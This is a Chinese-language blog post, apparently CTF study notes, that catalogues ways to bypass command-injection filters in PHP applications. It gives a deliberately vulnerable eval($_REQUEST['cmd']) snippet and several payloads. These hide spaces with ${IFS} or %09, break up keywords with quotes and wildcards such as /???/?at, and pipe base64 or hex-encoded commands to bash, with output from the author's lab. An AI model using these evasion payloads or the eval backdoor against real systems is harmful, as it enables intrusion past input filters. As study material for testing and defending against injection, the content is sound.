[一些总结]RCE中一些常见的绕过方法

相关知识网络上有太多人总结了，但还是想自己动动手写点东西加深加深印象，哈哈。

命令执行漏洞前提条件：

1.存在可调用执行系统命令的函数。
2.该函数参数可控。
3.对参数过滤不严格。

一些常见可以执行命令的函数：

1.eval()//把一串字符串作为PHP代码执行
2.system()/passthru()/exec()
3.call_user_func()/call_user_func_array() //回调函数
4.creat_function()
5.shell_exec //注意这玩意儿没回显，不过可以通过把它传给某个文件或者echo的方法看执行结果，比如：
    $output = shell_exec('ls -l'); // 执行ls -l命令并将输出保存到$output变量中
echo $output;
     /?cmd=ls -al / > viper3.txt
6.还可以用反引号``和$()执行命令。
7.preg_match的/e模式漏洞。

最后那个/e模式好像已经被弃用好久了。。举个栗子：

$pattern = '/(\d+)/e';
$replacement = '"$1" + 1';
$string = '123';

$result = preg_replace($pattern, $replacement, $string);
echo $result; // 输出124

/(\d+)/e模式匹配一个或多个数字，并使用"$1" + 1作为替换字符串。在替换过程中，"$1"被解析为匹配的数字，然后加1。因此，最终的替换结果是123 + 1，即124。

管道符(Windows)：

|		直接执行后面的语句
||		如果前面命令是错的那么就执行后面的语句，否则只执行前面的语句
&		前面和后面命令都要执行，无论前面真假
&&		如果前面为假，后面的命令也不执行，如果前面为真则执行两条命令

管道符(Linux)：

|		直接执行后面的语句
||		如果前面命令是错的那么就执行后面的语句，否则只执行前面的语句
&		前面和后面命令都要执行，无论前面真假
&&		如果前面为假，后面的命令也不执行，如果前面为真则执行两条命令
;       前后命令都要执行，无论前面真假

空格绕过(ls /和cat等均需空格)：

1.${IFS}

[viper3@localhost ~]$ ls${IFS}/
bin   dev  home  lib64	mnt  proc  run	 srv  tmp  var
boot  etc  lib	 media	opt  root  sbin  sys  usr

2.$IFS$9

[viper3@localhost ~]$ ls$IFS$9/
bin   dev  home  lib64	mnt  proc  run	 srv  tmp  var
boot  etc  lib	 media	opt  root  sbin  sys  usr

3.%09

 <?php
if (isset($_REQUEST['cmd'])) {
    eval($_REQUEST["cmd"]);
} else {
    highlight_file(__FILE__);
}
?> 

payload:/?cmd=system('ls%09/');

4.<和<>重定向符号

在Linux中，<是用于重定向输入的符号，它将一个文件的内容作为命令的输入。<符号后面跟着文件名，表示将该文件的内容作为命令的输入。

例如，假设有一个名为input.txt的文件，包含了一些文本内容。可以使用<符号将input.txt文件的内容作为命令的输入，如下所示：

command < input.txt

上述命令将会执行command命令，并将input.txt文件的内容作为command命令的输入。

另外，>符号用于重定向输出，它将命令的输出保存到一个文件中。如果文件不存在，则会创建该文件；如果文件已存在，则会覆盖原有内容。

而>>符号则用于追加输出，它将命令的输出追加到一个文件的末尾，而不是覆盖原有内容。

例如，假设有一个名为output.txt的文件，可以使用>符号将命令的输出保存到output.txt文件中，如下所示：

command > output.txt

上述命令将会执行command命令，并将其输出保存到output.txt文件中。

而使用>>符号可以将命令的输出追加到output.txt文件的末尾，如下所示：

command >> output.txt

上述命令将会执行command命令，并将其输出追加到output.txt文件的末尾。

总结起来，<用于重定向输入，>用于重定向输出，>>用于追加输出。

[viper3@localhost ~]$ cat<hello.txt
hello world!
yes
no
why
[viper3@localhost ~]$ cat<>hello.txt
hello world!
yes
no
why

注意这东西没法和ls配合使用。

5.利用{}

[viper3@localhost ~]$ {cat,hello.txt}
hello world!
yes
no
why
[viper3@localhost ~]$ {ls,/}
bin   dev  home  lib64	mnt  proc  run	 srv  tmp  var
boot  etc  lib	 media	opt  root  sbin  sys  usr

大括号（{}）在这个命令中被用作命令行扩展。它会将大括号中的内容展开为多个参数，然后将这些参数传递给命令进行处理。

6.SQL语句中可以利用/**/和()包裹字符串代替空格(这个就不算RCE里的绕过了，哈哈)

过滤关键字，比如cat,tac,ls之类的

替代：

more:一页一页的显示档案内容
less:与 more 类似
head:查看头几行
tac:从最后一行开始显示，可以看出 tac 是 cat 的反向显示
tail:查看尾几行
nl：显示的时候，顺便输出行号
od:以二进制的方式读取档案内容

利用某些转义符号：

'',"",\,${Z},$*,$@,$任意，${任意}

[viper3@localhost ~]$ l''s
crontab    hello.txtttttt  whatsthetime.txt  模板  图片  下载  桌面
hello.txt  runme2	   公共		     视频  文档  音乐
[viper3@localhost ~]$ l""s
crontab    hello.txtttttt  whatsthetime.txt  模板  图片  下载  桌面
hello.txt  runme2	   公共		     视频  文档  音乐
[viper3@localhost ~]$ l${Z}s
crontab    hello.txtttttt  whatsthetime.txt  模板  图片  下载  桌面
hello.txt  runme2	   公共		     视频  文档  音乐
[viper3@localhost ~]$ l/s
bash: l/s: 没有那个文件或目录
[viper3@localhost ~]$ l\s
crontab    hello.txtttttt  whatsthetime.txt  模板  图片  下载  桌面
hello.txt  runme2	   公共		     视频  文档  音乐
[viper3@localhost ~]$ l$*s
crontab    hello.txtttttt  whatsthetime.txt  模板  图片  下载  桌面
hello.txt  runme2	   公共		     视频  文档  音乐
[viper3@localhost ~]$ l$@s
crontab    hello.txtttttt  whatsthetime.txt  模板  图片  下载  桌面
hello.txt  runme2	   公共		     视频  文档  音乐
[viper3@localhost ~]$ l$9s
crontab    hello.txtttttt  whatsthetime.txt  模板  图片  下载  桌面
hello.txt  runme2	   公共		     视频  文档  音乐
[viper3@localhost ~]$ l${k}s
crontab    hello.txtttttt  whatsthetime.txt  模板  图片  下载  桌面
hello.txt  runme2	   公共		     视频  文档  音乐

拼接：

[viper3@localhost ~]$ a=hel;b=lo.txt;cat $a$b
hello world!
yes
no
why

使用反引号``或$()绕过(比如和printf配合使用)：

[viper3@localhost ~]$ printf "\154\163"
ls
[viper3@localhost ~]$ `printf "\154\163"`
crontab    hello.txtttttt  whatsthetime.txt  模板  图片  下载  桌面
hello.txt  runme2	   公共		     视频  文档  音乐
[viper3@localhost ~]$ (printf "\154\163")
ls[viper3@localhost ~]$ $(printf "\154\163")
crontab    hello.txtttttt  whatsthetime.txt  模板  图片  下载  桌面
hello.txt  runme2	   公共		     视频  文档  音乐

printf "??????"这东西是输出???代表的ASCII码值，???代表八进制(也可以用\x??十六进制)，$()这个符号是把括号里面的东西当命令执行,反引号同理。

通配符

在Linux中，通配符是用来匹配文件名或路径的特殊字符。它们可以用于命令行中的文件搜索、文件操作和正则表达式等场景中。

以下是常用的通配符：

    *：匹配任意字符（包括空字符）的任意数量。
    ?：匹配单个任意字符。
    []：匹配方括号内的任意一个字符。
    [!] 或 [^]：匹配不在方括号内的任意一个字符。
    {}：用于指定多个选择项，以逗号分隔。
    ~：表示当前用户的主目录。

举例来说，如果你想匹配所有以 .txt 结尾的文件，可以使用通配符 *.txt；如果你想匹配以 a 开头的三个字符的文件，可以使用通配符 a??。

举个栗子：

[viper3@localhost ~]$ cat he*
hello world!
yes
no
why
tom
jerry
chris
jack
[viper3@localhost ~]$ cat ?????.txt
hello world!
yes
no
why
*匹配任意数量，这东西可以和find查找命令结合起来:
find / -name "fl*"   /是根目录，搜索根目录下所有名字带fl的文件(fl开头，后面任意)
注意：这里的?和*都只能用于文件名，如果是命令(类似ls cat等)就不适用。
但是：
m0re师傅的文章里在开头加了个/???就可以把/?用于命令了：

zxcv0221@kali:~/桌面$ /???/?[a][t] ?''?''?''?''
you are good!
zxcv0221@kali:~/桌面$ /???/?[a][t] ?''?''?''?''
you are good!
zxcv0221@kali:~/桌面$ /???/?at flag
you are good!
zxcv0221@kali:~/桌面$ /???/?at ????
you are good!
zxcv0221@kali:~/桌面$ /???/?[a]''[t] ?''?''?''?''
you are good!

编码绕过(应该把前面那个printf的放在这里的，可惜)：

base64:(这东西可以和前面的``和$()配合使用)

[viper3@localhost ~]$ echo "Y2F0IGhlbGxvLnR4dA=="|base64 -d
cat hello.txt
[viper3@localhost ~]$ `echo "Y2F0IGhlbGxvLnR4dA=="|base64 -d`
hello world!
yes
no
why

Y2F0IGhlbGxvLnR4dA== 是cat hello.txt的base64

hex:

echo "636174202f666c6167" | xxd -r -p|bash ==>cat /flag

同上，仍能用``及$()替换最后管道符及bash

换行绕过(感觉这个没怎么用过)：

[viper3@localhost ~]$ ca\
> t \
> hello\
> .txt
hello world!
yes
no
why

\表示换行，下一行是这行的延续。

m0re师傅的文章中还有这么个东西：

$ echo "ca\\">shell   两个\是为了转义后面的\，以便将其作为普通字符写入文件。
$ echo "t\\">>shell
$ echo " fl\\">>shell
$ echo "ag">>shell
$ cat shell
ca\
t\
 fl\
ag
$ sh shell  
you are good!

sh shell是运行名为"shell"的脚本文件的意思。在Linux中，使用sh命令后跟脚本文件的名称可以运行该脚本。

利用$PATH环境变量绕过：

[viper3@localhost ~]$ echo $PATH
/usr/local/bin:/usr/local/sbin:/usr/bin:/usr/sbin:/bin:/sbin:/home/viper3/.local/bin:/home/viper3/bin
[viper3@localhost ~]$ echo ${PATH:5:1}${PATH:2:1}
ls
[viper3@localhost ~]$ `echo ${PATH:5:1}${PATH:2:1}`
crontab    hello.txtttttt  whatsthetime.txt  模板  图片  下载  桌面
hello.txt  runme2	   公共		     视频  文档  音乐
[viper3@localhost ~]$ `${PATH:5:1}${PATH:2:1}`
"hello.txt":1: bad minute
errors in crontab file, can't install.

注意不要少了echo!

以上内容参考了这些师傅们的文章，感谢：

https://blog.csdn.net/qq_53142368/article/details/116152477
https://zhuanlan.zhihu.com/p/391439312
https://blog.csdn.net/qq_45836474/article/details/107248010
https://blog.csdn.net/qq_51295677?type=blog